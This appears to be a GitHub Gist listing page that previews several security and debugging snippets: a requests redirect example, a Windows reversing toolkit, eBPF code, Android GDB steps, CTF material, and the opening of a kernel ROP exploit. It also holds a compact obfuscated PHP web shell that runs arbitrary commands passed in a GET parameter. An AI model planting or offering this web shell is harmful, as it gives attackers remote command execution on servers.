Skip to content

Instantly share code, notes, and snippets.

View echel0nn's full-sized avatar
💭
STATUS: broken

echel0n echel0nn

💭
STATUS: broken
75 followers · 72 following
  • Black Mesa Research Facility
View GitHub Profile
@cbare
cbare / test_requests_redirect.py
Created December 19, 2012 00:05
Show how to follow redirects, including rePOSTing, with the python requests library.
## follow redirects, including rePOSTing, with the requests library.
######################################################################
import requests
## authentication with no redirects
ans = requests.post(url=endp_prod + "/session", data=json.dumps(d), headers=h)
## results in a successful login
ans.status_code
@jthuraisamy
jthuraisamy / windows-toolkit.md
Last active April 12, 2022 20:00
Windows Toolkit

Windows Toolkit

Binary

Native Binaries

IDA Plugins Preferred Neutral Unreviewed
@lizrice
lizrice / hello_map.py
Last active July 19, 2023 08:20
eBPF hello world
#!/usr/bin/python
from bcc import BPF
from time import sleep
# This outputs a count of how many times the clone and execve syscalls have been made
# showing the use of an eBPF map (called syscall).
program = """
BPF_HASH(syscall);
@sekkr1
sekkr1 / android_gdb.md
Created August 12, 2019 15:27
Attaching GDB to Android apps' native libraries

How to GDB android native libraries

[1] Install NDK from android studio

[2] Push appropriate gdb-server to phone

adb push ~/android-sdk-linux/ndk-bundle/prebuilt/android-<arch>/gdbserver/gdbserver /data/local/tmp
adb shell "chmod 777 /data/local/tmp/gdbserver"
adb shell "ls -l /data/local/tmp/gdbserver"

[4] Forward ports

adb forward tcp:1337 tcp:1337

@shinh
shinh / gen_el_lua_py2_jvm.rb
Last active December 26, 2020 18:15
bytecode polyglot - def con qual 2020 bytecoooding
#!/usr/bin/env ruby
# elisp, lua, python2, and jvm
# https://docs.google.com/spreadsheets/d/1l1N_wtK8xA7N-ezG5iUjDeg6iKQgVaYf8ckTSp30QIo/
$flag = File.read('flag').chomp
$ml_preamble = nil
$lua_preamble = nil
$ruby_preamble = nil
@n4sm
n4sm / exploit.c
Last active August 19, 2021 12:24
Kernel Exploitation - ROP bypass KPTI / smep
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <assert.h>
#include <sys/ioctl.h>
@farazsth98
farazsth98 / balsnctf_diary.md
Last active November 17, 2020 00:04

Functionality

At the beginning, the binary lets you enter 0x20 bytes for your name. This is stored in the bss section, and it is not null terminated. After this, you get the following menu options:

  1. Show Name - Shows you your name
  2. Write Diary - Lets you allocate a page of max 0x80 size. The first four bytes of this page chunk stores the size you choose, and then the rest is the content you enter. calloc is used to allocate this chunk. This chunk's pointer is stored in an array immediately after your name in the bss section (meaning the name can be aligned to it and you can leak it using option 1). You can have a max of 14 pages.
  3. Read Diary - Lets you pick a page index, and the corresponding page contents is output to you (using puts).
  4. Edit Diary - Lets you pick a page index to edit. It will use the size stored in the first 4 bytes of the page chunk to determine how many bytes you can edit. The page index you enter is signed, so there is a bug here (you can enter negative
@0xSojalSec
0xSojalSec / rev_shell.php
Created January 28, 2023 18:46 — forked from terjanq/rev_shell.php
The shortest non-alphanumeric reverse shell script (19 bytes)
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;
/*
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code will be produced, \xa0\xb8\xba\xab will be
* treated as constant therefore no " needed. It is also not copyable
* string because of non-ascii characters
*
* Explanation: